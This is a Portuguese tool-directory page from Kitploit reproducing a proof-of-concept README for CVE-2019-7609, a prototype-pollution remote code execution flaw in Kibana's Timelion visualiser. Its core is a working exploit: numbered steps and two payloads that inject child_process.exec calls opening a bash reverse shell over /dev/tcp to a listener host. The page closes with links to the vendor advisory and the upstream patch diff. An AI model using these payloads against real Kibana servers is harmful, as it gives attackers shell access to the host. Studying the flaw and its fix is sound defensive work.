Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-7609 — RCE em versões do Kibana anteriores à 5.6.15 e 6.6.0 no visualizador Timelion | Kitploit
Ferramentas/GitHubGitHub/mpgn/cve-2019-7609
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações Web
GitHubmpgn/cve-2019-7609

CVE-2019-7609

RCE em versões do Kibana anteriores à 5.6.15 e 6.6.0 no visualizador Timelion

Ver Repositório
5612há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-7609

As versões do Kibana anteriores a 5.6.15 e 6.6.1 contêm uma falha de execução arbitrária de código no visualizador Timelion. Um atacante com acesso ao aplicativo Timelion poderia enviar uma solicitação que tentaria executar código JavaScript. Isso poderia possivelmente levar um atacante a executar comandos arbitrários com as permissões do processo Kibana no sistema host.

Descoberto por @securityMB

Nota: Eu testei esse ataque no Kibana 6.6.0, mas não estava funcionando... do meu lado, apenas versões do Kibana < 6.6.0 são vulneráveis, conforme explicado por @securityMB

EDIÇÃO 20/12/2019 : se o painel Canvas não estiver acessível, basta conferir este writeup do @Synacktiv https://www.synacktiv.com/posts/pentest/pwning-an-outdated-kibana-with-not-so-sad-vulnerabilities.html

kibana

Exploração

  1. Abra o Kibana
  2. Cole um dos seguintes payloads no visualizador Timelion
  3. Clique em executar
  4. No painel esquerdo, clique em Canvas
  5. Seu shell reverso deve aparecer! :)
  • payload por @securityMB
root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
  • payload por @chybeta
root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Análise detalhada (inglês):

  • https://slides.com/securitymb/prototype-pollution-in-kibana/#/

Aviso de segurança:

  • https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077

Patch

https://github.com/elastic/kibana/commit/3377f813a5d96ff466bdf7343ce161de24830ed4.patch

root@kitploit:~
From 3377f813a5d96ff466bdf7343ce161de24830ed4 Mon Sep 17 00:00:00 2001
From: ppisljar <[email protected]>
Date: Wed, 16 Jan 2019 06:01:20 -0800
Subject: [PATCH] fixes

---
 .../core_plugins/timelion/server/series_functions/props.js      | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/legacy/core_plugins/timelion/server/series_functions/props.js b/src/legacy/core_plugins/timelion/server/series_functions/props.js
index 81b74901d4db..80e9cafd6712 100644
--- a/src/legacy/core_plugins/timelion/server/series_functions/props.js
+++ b/src/legacy/core_plugins/timelion/server/series_functions/props.js
@@ -32,7 +32,7 @@ function unflatten(data) {
     let prop = '';
     let m;
     while (m = regex.exec(p)) {
-      cur = cur[prop] || (cur[prop] = (m[2] ? [] : {}));
+      cur = (cur.hasOwnProperty(prop) && cur[prop]) || (cur[prop] = (m[2] ? [] : {}));
       prop = m[2] || m[1];
     }
     cur[prop] = data[p];
Baixar ferramenta